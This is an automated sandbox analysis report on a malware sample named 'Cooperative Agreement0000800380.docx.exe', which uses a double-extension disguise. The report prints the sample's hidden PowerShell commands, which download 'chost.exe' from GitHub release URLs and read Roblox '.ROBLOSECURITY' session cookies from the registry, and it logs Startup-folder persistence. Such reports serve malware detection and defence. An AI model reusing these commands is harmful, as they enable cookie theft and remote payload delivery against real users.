                    Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2008775784.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.16.dr
                    Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2018415439.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdbGCTL source: chost.exe, 00000010.00000003.2009525097.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.16.dr
                    Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: chost.exe, 00000011.00000002.2385277924.00007FFDFF6C1000.00000040.00000001.01000000.00000015.sdmp
                    Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2011730854.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeUnpacked PE file: 0.2.Cooperative Agreement0000800380.docx.exe.400000.0.unpack
                    Source: Yara matchFile source: Cooperative Agreement0000800380.docx.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.2.Cooperative Agreement0000800380.docx.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.Cooperative Agreement0000800380.docx.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/scan0052p/releases/download/secure_prj00/scan000373.jpg/' -outfile scan000373.jpg"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/poh21/releases/download/hu23/chost.exe/' -outfile chost.exe"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/scan0052p/releases/download/secure_prj00/scan000373.jpg/' -outfile scan000373.jpg"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/poh21/releases/download/hu23/chost.exe/' -outfile chost.exe"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                    Source: api-ms-win-core-console-l1-1-0.dll.16.drStatic PE information: 0x975A648E [Sun Jun 19 20:33:18 2050 UTC]
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4z11l1tq\4z11l1tq.cmdline"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4z11l1tq\4z11l1tq.cmdline"
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeCode function: 0_2_0040A756 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,0_2_0040A756
                    Source: _ctypes.pyd.16.drStatic PE information: real checksum: 0x0 should be: 0x16009
                    Source: _sqlite3.pyd.16.drStatic PE information: real checksum: 0x0 should be: 0x15dfb
                    Source: _lzma.pyd.16.drStatic PE information: real checksum: 0x0 should be: 0x22ff2
                    Source: libssl-3.dll.16.drStatic PE information: real checksum: 0x0 should be: 0x4330c
                    Source: _bz2.pyd.16.drStatic PE information: real checksum: 0x0 should be: 0x1bdb0
                    Source: select.pyd.16.drStatic PE information: real checksum: 0x0 should be: 0xa27a
                    Source: unicodedata.pyd.16.drStatic PE information: real checksum: 0x0 should be: 0x4e672
                    Source: libcrypto-3.dll.16.drStatic PE information: real checksum: 0x0 should be: 0x197f77
                    Source: _hashlib.pyd.16.drStatic PE information: real checksum: 0x0 should be: 0xcc8b
                    Source: _decimal.pyd.16.drStatic PE information: real checksum: 0x0 should be: 0x2a089
                    Source: _socket.pyd.16.drStatic PE information: real checksum: 0x0 should be: 0x196aa
                    Source: _queue.pyd.16.drStatic PE information: real checksum: 0x0 should be: 0x11a1d
                    Source: libffi-8.dll.16.drStatic PE information: real checksum: 0x0 should be: 0xa1d1
                    Source: _ssl.pyd.16.drStatic PE information: real checksum: 0x0 should be: 0x1ee96
                    Source: python312.dll.16.drStatic PE information: real checksum: 0x0 should be: 0x1c0022
                    Source: sqlite3.dll.16.drStatic PE information: real checksum: 0x0 should be: 0xa890d
                    Source: chost.exe.4.drStatic PE information: real checksum: 0x840198 should be: 0x847fd9
                    Source: Cooperative Agreement0000800380.docx.exeStatic PE information: real checksum: 0x0 should be: 0x1dfaf
                    Source: 4z11l1tq.dll.80.drStatic PE information: real checksum: 0x0 should be: 0xd34a
                    Source: Cooperative Agreement0000800380.docx.exeStatic PE information: section name: .code
                    Source: VCRUNTIME140.dll.16.drStatic PE information: section name: fothk
                    Source: VCRUNTIME140.dll.16.drStatic PE information: section name: _RDATA
                    Source: libffi-8.dll.16.drStatic PE information: section name: UPX2
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDEAE49327 push rsp; ret 17_2_00007FFDEAE49328
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDEAE482D8 push rdi; iretd 17_2_00007FFDEAE482DA
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDEAE45C31 push r10; ret 17_2_00007FFDEAE45C33
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDEAE48419 push r10; retf 17_2_00007FFDEAE48485
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDEAE4808B push r12; iretd 17_2_00007FFDEAE4809F
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDEAE45F56 push r12; ret 17_2_00007FFDEAE45F73
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDEAE48F42 push rsp; iretq 17_2_00007FFDEAE48F43
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDEAE45F01 push r12; ret 17_2_00007FFDEAE45F10
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDEAE45EB4 push rsp; iretd 17_2_00007FFDEAE45EB5
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDEAE49686 push rdx; ret 17_2_00007FFDEAE496DD
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDEAE47689 push r12; ret 17_2_00007FFDEAE476CD
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDEAE45E67 push rdi; iretd 17_2_00007FFDEAE45E69
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDEAE46859 push rsi; ret 17_2_00007FFDEAE46890
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDEAE47FFF push r12; ret 17_2_00007FFDEAE4804A
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDEAE45FB9 push r10; ret 17_2_00007FFDEAE45FCC
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDEAE45F7B push r8; ret 17_2_00007FFDEAE45F83
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDEAE47F67 push rbp; iretq 17_2_00007FFDEAE47F68
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDEAE45D06 push r12; ret 17_2_00007FFDEAE45D08
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDEAE45CED push rdx; ret 17_2_00007FFDEAE45CF7
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDEAE45CE0 push r10; retf 17_2_00007FFDEAE45CE2
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDEAE45CE5 push r8; ret 17_2_00007FFDEAE45CEB
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDEAE494B9 push rsp; retf 17_2_00007FFDEAE494BA
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDEAE4763E push rbp; retf 17_2_00007FFDEAE47657
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDEAE45E18 push rsp; ret 17_2_00007FFDEAE45E1C
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDEAE45DF7 push r10; retf 17_2_00007FFDEAE45DFA
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDEAE48DBF push rsp; retf 17_2_00007FFDEAE48DC0
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF6A64331 push rcx; ret 17_2_00007FFDF6A64332
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FFD9376D2A5 pushad ; iretd 25_2_00007FFD9376D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FFD9388BCD2 push E85B7CD5h; ret 25_2_00007FFD9388BCF9
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 79_2_00007FFD96386329 push ecx; ret 79_2_00007FFD9638632C
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1

                    Persistence and Installation Behavior

                    barindex
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: chost.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\select.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\_hashlib.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\_lzma.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\ucrtbase.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\_ssl.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\VCRUNTIME140.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\_queue.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\sqlite3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\python312.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\chost.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\rar.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\_sqlite3.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\libcrypto-3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\_bz2.pydJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\4z11l1tq\4z11l1tq.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\unicodedata.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\_decimal.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\_ctypes.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\libssl-3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\_socket.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\libffi-8.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?.scrJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?.scrJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (85).png
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: Possible double extension: docx.exeStatic PE information: Cooperative Agreement0000800380.docx.exe
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 16_2_00007FF6943676B0 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,16_2_00007FF6943676B0
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
